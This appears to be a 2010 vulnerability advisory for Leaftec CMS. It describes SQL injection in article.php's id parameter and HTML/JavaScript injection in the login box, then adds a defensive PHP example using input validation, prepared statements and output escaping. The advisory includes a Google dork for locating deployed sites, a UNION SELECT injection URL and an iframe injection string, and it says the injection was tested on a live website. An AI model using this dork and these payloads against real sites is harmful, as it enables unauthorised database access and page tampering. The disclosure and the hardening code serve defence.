# Exploit Title: leaftec cms multiple vulnerabilities
# Date: 21.03.2010
# Author: Valentin Hoebel
# Version:
# Tested on: Debian etch
# CVE:
# Code:
: General information
: Leaftec cms multiple vulnerabilities discovered
: By Valentin Hoebel
: Valentin@xenuser.org
: Product information
: Name = leaftec cms
: Vendor = leaftec
: Vendor Website = http://www.leaftec.de/
: About the product = http://www.leaftec.de/serv_cms.php
: Affected versions =
: Google dork: e.g. "©2006 leaftec Design"
: Vulnerabilities
#1 SQL Injection
Sadly, the CMS is not available for free download, but some German companies are using it.
Leaftec CMS contains a blog feature which displays written content, file: article.php.
Vulnerable URL:
http://www.some-cool-domain.tld/article.php?id=XX
Examples for testing and injecting SQL stuff:
http://www.some-cool-domain.tld/article.php?id=
http://www.some-cool-domain.tld/article.php?id="
http://www.some-cool-domain.tld/article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version(),7--
(Tested on a live website using Leaftec CMS.)
--------------------------------------------------------------------------------------------------------
#2 XSS/HTML Code Injection
Several parts of the CMS allow HTML and JavaScript code injection, e.g. the login box.
After submitting the form, the CMS puts a red border around the login and password fields and also inserts the injected code into the page unchanged.
Example for HTML code:
"><iframe src=http://www.google.de></iframe>
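Both issues come from the same root cause: a request parameter is passed straight into a query (#1) and straight back into the page (#2). The following is an added example, not Leaftec's code (the CMS source is not public), of how an article.php lookup and a login field can be written so that the id and login values shown above are neutralised; the table and column names are assumptions.

```php
<?php
// Added example, not Leaftec's code. Table/column names (articles, id,
// title, body) are assumed; the two functions mirror the two advisory items.
declare(strict_types=1);

function loadArticle(PDO $db, $rawId): ?array
{
    // #1: article.php?id=XX. Accept only a plain decimal integer before the
    // value gets anywhere near SQL; a bare quote, an empty value or
    // "XX AND 1=2 UNION ..." all fail this check.
    if (!is_string($rawId) || $rawId === '' || !ctype_digit($rawId)) {
        return null;
    }
    // Bind the value instead of concatenating it into the query string, so
    // even a value that passes validation can never change the statement.
    $stmt = $db->prepare('SELECT id, title, body FROM articles WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function renderLoginField(string $name, string $submittedValue, bool $failed): string
{
    // #2: the login box echoes the submitted value back into the form.
    // Escaping with ENT_QUOTES turns "><iframe ...> into literal text, so the
    // value attribute cannot be closed early. $name is a fixed literal from
    // code, never user input.
    $safe = htmlspecialchars($submittedValue, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $style = $failed ? ' style="border:1px solid red"' : '';
    return sprintf('<input type="text" name="%s" value="%s"%s>', $name, $safe, $style);
}

// Usage with the request values from the advisory (DSN/credentials assumed):
$db = new PDO('mysql:host=localhost;dbname=cms', 'user', 'pass', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
]);
$article = loadArticle($db, $_GET['id'] ?? '');
if ($article === null) {
    http_response_code(404);
    exit('Article not found');
}
echo renderLoginField('login', (string) ($_POST['login'] ?? ''), true);
```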
--------------------------------------------------------------------------------------------------------
: Additional information
: Vendor contacted = 21.03.2010
: Vulnerabilities fixed = no reply yet
: Solution = Upgrade to version XX or higher if available